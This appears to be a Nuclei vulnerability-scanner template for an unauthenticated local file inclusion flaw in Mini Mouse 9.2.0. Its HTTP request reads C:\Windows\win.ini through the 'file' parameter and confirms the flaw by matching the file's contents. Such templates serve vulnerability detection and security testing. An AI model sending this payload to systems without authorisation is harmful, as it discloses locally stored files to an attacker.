Vulnerability Description
Mini Mouse 9.2.0 is vulnerable to local file inclusion because it allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter.
id: minimouse-lfi

info:
  name: Mini Mouse 9.2.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Mini Mouse 9.2.0 is vulnerable to local file inclusion because it allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter.
  reference:
    - https://www.exploit-db.com/exploits/49744
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,edb,minimouse,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
        part: body
# digest: 4a0a00473045022100ac2b4997f752660214d4738d5139a6821ad4a53912afbe73035d6f0b38cd1974022029d6e4823e78c75ae48567b91442957661cd715f99d5878ecbf27605e9ff880c:922c64590222798bb761d5b6d8e72950